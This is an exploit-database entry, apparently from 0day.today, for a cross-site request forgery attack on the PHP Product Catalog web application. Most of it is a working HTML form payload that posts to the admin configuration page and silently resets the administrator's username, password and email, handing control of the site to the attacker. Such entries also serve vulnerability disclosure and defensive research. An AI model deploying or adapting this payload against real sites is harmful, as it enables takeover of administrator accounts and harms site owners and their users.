PHP Product Catalog CSRF Change Administrator Password

2010-01-29T00:00:00
ID 1337DAY-ID-10735
Type zdt
Reporter bi0
Modified 2010-01-29T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================
PHP Product Catalog CSRF Change Administrator Password
======================================================

                ______     __     ______
               /\  == \   /\ \   /\  __ \
               \ \  __<   \ \ \  \ \ \/\ \
                \ \_____\  \ \_\  \ \_____\
                 \/_____/   \/_/   \/_____/
 
                 01000010 01101001 01001111
 
[#]----------------------------------------------------------------[#]
#
# [+] PHP Product Catalog - [ CSRF ] Change Administrator Password
#
#  // Author Info
# [x] Author: bi0
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
#     [ Login ]
#     http://[server]/[path]/admin.php
#
# // Start CSRF
|-------------------------------------------------------------------------------|
 
<html>
<form action="http://[server]/admin.php?p=otherConfig&sOption=save" method="POST">
Admin : <input type="text" name="login" value="admin" size="5" /><br>
Passwd  <input type="text" name="pass" value="123" size="5" /><br>
Email : <input type="text" name="email" value="[email protected]" size="16" /><br>
<input type="submit" name="save" value="Save">
</form>
</html>
 
|-------------------------------------------------------------------------------|
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]



#  0day.today [2018-04-14]  #